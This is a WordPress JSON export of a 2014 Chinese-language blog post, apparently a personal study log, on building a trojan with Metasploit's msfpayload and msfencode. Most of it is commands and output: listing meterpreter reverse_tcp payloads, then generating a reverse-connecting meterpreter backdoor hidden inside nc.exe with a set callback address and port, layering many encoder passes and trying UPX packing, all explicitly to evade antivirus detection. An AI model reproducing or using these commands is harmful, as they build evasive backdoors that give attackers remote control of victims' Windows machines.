{"id":87,"date":"2014-06-24T07:23:08","date_gmt":"2014-06-24T07:23:08","guid":{"rendered":"http:\/\/ixyzero.com\/blog\/?p=87"},"modified":"2014-06-24T07:23:08","modified_gmt":"2014-06-24T07:23:08","slug":"%e4%bd%bf%e7%94%a8msfpayload%e5%92%8cmsfencode%e8%bf%9b%e8%a1%8c%e6%9c%a8%e9%a9%ac%e7%9a%84%e7%bc%96%e5%86%99%e5%92%8c%e7%bc%96%e7%a0%81%e5%a4%84%e7%90%86","status":"publish","type":"post","link":"https:\/\/ixyzero.com\/blog\/archives\/87.html","title":{"rendered":"\u4f7f\u7528msfpayload\u548cmsfencode\u8fdb\u884c\u6728\u9a6c\u7684\u7f16\u5199\u548c\u7f16\u7801\u5904\u7406"},"content":{"rendered":"

\u4f7f\u7528msfpayload\u548cmsfencode\u8fdb\u884c\u6728\u9a6c\u7684\u7f16\u5199\u548c\u7f16\u7801\u5904\u7406<\/strong><\/p>\n

# msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter \u00a0 \u00a0#\u5148\u5217\u51fa\u53ef\u7528\u7684msfpayload\u6a21\u5757\uff0c\u7136\u540e\u501f\u52a9grep\u5de5\u5177\u8fdb\u884c\u8fc7\u6ee4\uff0c\u627e\u51fa\u81ea\u5df1\u9700\u8981\u7684\u6a21\u5757\u53ca\u5176\u8def\u5f84\n\nwindows\/meterpreter\/reverse_tcp\u00a0\u00a0\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)\nwindows\/meterpreter\/reverse_tcp_allports\u00a0Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)\nwindows\/meterpreter\/reverse_tcp_dns\u00a0\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)\nwindows\/meterpreter\/reverse_tcp_rc4\u00a0\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)\nwindows\/meterpreter\/reverse_tcp_rc4_dns\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)\nwindows\/patchupmeterpreter\/reverse_tcp\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL (staged)\nwindows\/patchupmeterpreter\/reverse_tcp_allports\u00a0\u00a0Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)\nwindows\/patchupmeterpreter\/reverse_tcp_dns\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL (staged)\nwindows\/patchupmeterpreter\/reverse_tcp_rc4\u00a0\u00a0Connect back to the attacker, Inject the meterpreter server DLL (staged)\nwindows\/patchupmeterpreter\/reverse_tcp_rc4_dns\u00a0Connect back to the attacker, Inject the meterpreter server DLL (staged)\nwindows\/x64\/meterpreter\/reverse_tcp\u00a0\u00a0\u00a0\u00a0Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)<\/pre>\n
msfpayload -l | grep windows | grep reverse_tcp | grep meterpreter\u00a0#\u547d\u4ee4\u201cmsfpayload -l\u201d\u7528\u6765\u5217\u51fa\u653b\u51fb\u8f7d\u8377\uff0c\u7136\u540e\u4f7f\u7528grep\u547d\u4ee4\u67e5\u8be2\u4f60\u6240\u9700\u8981\u7684\u653b\u51fb\u8f7d\u8377\u6a21\u5757\uff0c\u4f60\u8981\u653b\u51fb\u7684\u76ee\u6807\u4e3b\u673a\u662fWindows\u7cfb\u7edf(grep windows)\uff0c\u8981\u6709\u56de\u8fde\u81f3\u76d1\u542c\u4e3b\u673a\u7684\u80fd\u529b(grep reverse_tcp)\uff0c\u5e76\u652f\u6301\u540e\u6e17\u900f\u653b\u51fb\u529f\u80fd(grep meterpreter)<\/strong><\/span><\/p>\n
# msfpayload windows\/meterpreter\/reverse_tcp O\u00a0#\u6700\u540e\u4e00\u4e2a\u662f\u5927\u5199\u7684o\uff0c\u800c\u4e0d\u662f\u6570\u5b570,\u7528\u4e8e\u67e5\u770b\u653b\u51fb\u8f7d\u8377\u6a21\u5757\u7684\u914d\u7f6e\u53c2\u6570\n\nName: Windows Meterpreter (Reflective Injection), Reverse TCP Stager\nModule: payload\/windows\/meterpreter\/reverse_tcp\nPlatform: Windows\nArch: x86\nNeeds Admin: No\nTotal size: 290\nRank: Normal\n\nProvided by:\nskape <>\nsf <>\nhdm <>\n\nBasic options:\nName\u00a0\u00a0\u00a0\u00a0\u00a0 Current Setting\u00a0 Required\u00a0 Description\n----\u00a0\u00a0\u00a0\u00a0\u00a0 ---------------\u00a0 --------\u00a0 -----------\nEXITFUNC\u00a0 process\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Exit technique: seh, thread, process, none\nLHOST\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen address\nLPORT\u00a0\u00a0\u00a0\u00a0 4444\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 yes\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 The listen port\n\nDescription:\nConnect back to the attacker, Inject the meterpreter server DLL via\nthe Reflective Dll Injection payload (staged)<\/pre>\n
======
\n#\u00a0\u6267\u884cmsfpayload\u548cmsfencode\u547d\u4ee4\u62a5\u9519(\u540e\u6765\u53d1\u73b0\u95ee\u9898\u5728\u4e8enc.exe\u5373\u4f7f\u662f\u5728\u5f53\u524d\u76ee\u5f55\u4e0b\u4e5f\u4e0d\u80fd\u76f4\u63a5\u4f7f\u7528nc.exe\uff0c\u800c\u8981\u4f7f\u7528.\/nc.exe\u6216\u662f\u76f4\u63a5\u7528\u7edd\u5bf9\u8def\u5f84)<\/strong>\uff1a<\/p>\n
# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe -e x86\/shikata_ga_nai -c 5\n[*] x86\/shikata_ga_nai succeeded with size 317 (iteration=1)\n\n[*] x86\/shikata_ga_nai succeeded with size 344 (iteration=2)\n\n[*] x86\/shikata_ga_nai succeeded with size 371 (iteration=3)\n\n[*] x86\/shikata_ga_nai succeeded with size 398 (iteration=4)\n\n[*] x86\/shikata_ga_nai succeeded with size 425 (iteration=5)\n\n[-] x86\/shikata_ga_nai failed: No such file or directory - \/opt\/metasploit\/apps\/pro\/msf3\/data\/templates\/nc.exe\n[-] No encoders succeeded.<\/pre>\n
# find \/ -name “*shikata_ga_nai*”\/usr\/share\/metasploit-framework\/modules\/encoders\/x86\/shikata_ga_nai.rb
\n————————————<\/p>\n
# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x nc.exe -k -o nc_encode.exe\n[*] x86\/shikata_ga_nai succeeded with size 317 (iteration=1)\n\n[-] x86\/shikata_ga_nai failed: No such file or directory - \/opt\/metasploit\/apps\/pro\/msf3\/data\/templates\/nc.exe\n[-] No encoders succeeded.<\/pre>\n
 <\/p>\n
#\u00a0msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x \/root\/Desktop\/temp\/nc.exe -k -o nc_encode.exe -e x86\/shikata_ga_nai -c 5<\/strong>
\n[*] x86\/shikata_ga_nai succeeded with size 317 (iteration=1)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 344 (iteration=2)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 371 (iteration=3)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 398 (iteration=4)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 425 (iteration=5)<\/p>\n
#\u00a0msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86\/shikata_ga_nai -c 5 -t raw | msfencode -e x86\/alpha_upper -c 2 -t raw | msfencode -e x86\/shikata_ga_nai -c 5 -t raw | msfencode -e x86\/countdown -c 5 -t exe -x \/root\/Desktop\/temp\/nc.exe -k -o nc_encode_17.exe<\/strong>\u00a0#\u4e3a\u4e86\u8fdb\u884c\u514d\u6740\u5904\u7406\uff0c\u8fd9\u91cc\u6211\u5bf9\u653b\u51fb\u8f7d\u8377\u4e00\u5171\u6267\u884c\u4e8617\u6b21\u7f16\u7801(5\u6b21shikata_ga_nai\u30012\u6b21alpha_upper\u30015\u6b21shikata_ga_nai\u30015\u6b21countdown)
\n[*] x86\/shikata_ga_nai succeeded with size 317 (iteration=1)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 344 (iteration=2)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 371 (iteration=3)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 398 (iteration=4)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 425 (iteration=5)<\/p>\n
[*] x86\/alpha_upper succeeded with size 919 (iteration=1)<\/p>\n
[*] x86\/alpha_upper succeeded with size 1907 (iteration=2)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 1936 (iteration=1)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 1965 (iteration=2)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 1994 (iteration=3)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 2023 (iteration=4)<\/p>\n
[*] x86\/shikata_ga_nai succeeded with size 2052 (iteration=5)<\/p>\n
[*] x86\/countdown succeeded with size 2070 (iteration=1)<\/p>\n
[*] x86\/countdown succeeded with size 2088 (iteration=2)<\/p>\n
[*] x86\/countdown succeeded with size 2106 (iteration=3)<\/p>\n
[*] x86\/countdown succeeded with size 2124 (iteration=4)<\/p>\n
[*] x86\/countdown succeeded with size 2142 (iteration=5)<\/p>\n
# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -e x86\/shikata_ga_nai -c 5 -t raw | msfencode -e x86\/call4_dword_xor -c 3 -t raw | msfencode -e x86\/context_time -c 5 -t raw | msfencode -e x86\/jmp_call_additive -c 5 -t raw | msfencode -e x86\/shikata_ga_nai -c 5 -t exe -x \/root\/Desktop\/temp\/nc.exe -k -o nc_encode_23.exe\u00a0#\u867d\u7136\u8fd9\u4e48\u590d\u6742\u7684\u7f16\u7801\u4e8623\u6b21\uff0c\u4f46\u8fd8\u662f\u88ab\u68c0\u51fa\u6765\u4e86\uff0c\u800c\u4e14\u7a0b\u5e8f\u5df2\u7ecf\u4e0d\u53ef\u6267\u884c\u4e86<\/strong><\/p>\n
\u5bf9\u751f\u6210\u7684\u6728\u9a6c\u7a0b\u5e8f\u8fdb\u884cUPX\u7f16\u7801\uff0c\u671f\u671b\u8fdb\u4e00\u6b65\u7684\u5904\u7406\u80fd\u591f\u8d77\u5230\u514d\u6740\u7684\u6548\u679c\uff08\u4e0d\u8fc7\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\u603b\u662f\u51fa\u73b0”section size problem”\u7684\u95ee\u9898\uff1f\uff09\uff1a<\/p>\n
# msfpayload windows\/meterpreter\/reverse_tcp LHOST=192.168.221.128 LPORT=6789 R | msfencode -t exe -x \/root\/Desktop\/temp\/nc.exe -k -o nc_encode.exe -e x86\/shikata_ga_nai -c 5\n[*] x86\/shikata_ga_nai succeeded with size 317 (iteration=1)\n\n[*] x86\/shikata_ga_nai succeeded with size 344 (iteration=2)\n\n[*] x86\/shikata_ga_nai succeeded with size 371 (iteration=3)\n\n[*] x86\/shikata_ga_nai succeeded with size 398 (iteration=4)\n\n[*] x86\/shikata_ga_nai succeeded with size 425 (iteration=5)\n\n# upx -6 -o nc_encode_upx6.exe nc_encode.exe\nUltimate Packer for eXecutables\nCopyright (C) 1996 - 2011\nUPX 3.08\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Markus Oberhumer, Laszlo Molnar & John Reiser\u00a0\u00a0 Dec 12th 2011\n\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 File size\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Ratio\u00a0\u00a0\u00a0\u00a0\u00a0 Format\u00a0\u00a0\u00a0\u00a0\u00a0 Name\n--------------------\u00a0\u00a0 ------\u00a0\u00a0 -----------\u00a0\u00a0 ----------\nupx: nc_encode.exe: CantPackException: section size problem\n\nPacked 1 file: 0 ok, 1 error.<\/pre>\n
==============================================<\/p>\n
# msfencode -h\n\n    Usage: \/opt\/metasploit\/apps\/pro\/msf3\/msfencode <options>\n\n    OPTIONS:\n-a <opt>\u00a0 The architecture to encode as\n-b <opt>\u00a0 The list of characters to avoid: 'x00xff'\n-c <opt>\u00a0 The number of times to encode the data\n-d <opt>\u00a0 Specify the directory in which to look for EXE templates\n-e <opt>\u00a0 The encoder to use\n-h\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Help banner\n-i <opt>\u00a0 Encode the contents of the supplied file path\n-k\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Keep template working; run payload in new thread (use with -x)\uff08\u9700\u8981\u548c-x\u9009\u9879\u4e00\u540c\u4f7f\u7528\uff0c\u5728\u65b0\u7ebf\u7a0b\u4e2d\u8fd0\u884c\u6728\u9a6c\uff09\n-l\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 List available encoders\n-m <opt>\u00a0 Specifies an additional module search path\n-n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Dump encoder information\n-o <opt>\u00a0 The output file\n-p <opt>\u00a0 The platform to encode for\n-s <opt>\u00a0 The maximum size of the encoded data\n-t <opt>\u00a0 The output format: bash,c,csharp,dw,dword,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,dll,elf,exe,exe-only,exe-service,exe-small,loop-vbs,macho,msi,msi-nouac,psh,psh-net,vba,vba-exe,vbs,war\n-v\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Increase verbosity\n-x <opt>\u00a0 Specify an alternate executable template\uff08\u6307\u5b9a\u4e00\u4e2a\u53ef\u9009\u7684\u53ef\u6267\u884c\u7a0b\u5e8f\u4f5c\u4e3a\u6a21\u7248\uff09<\/pre>\n
\u7b97\u662f\u4e4b\u524d\u7684\u4e00\u4e2a\u5b66\u4e60\u8bb0\u5f55\u5427\u3002\u3002\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
\u4f7f\u7528msfpayload\u548cmsfencode\u8fdb\u884c\u6728\u9a6c\u7684\u7f16\u5199\u548c\u7f16\u7801\u5904\u7406 # msfpayload -l | gr […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,25,12],"tags":[70],"class_list":["post-87","post","type-post","status-publish","format-standard","hentry","category-linux","category-security","category-tools","tag-metasploit"],"views":4496,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/87","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=87"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/87\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=87"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=87"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=87"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}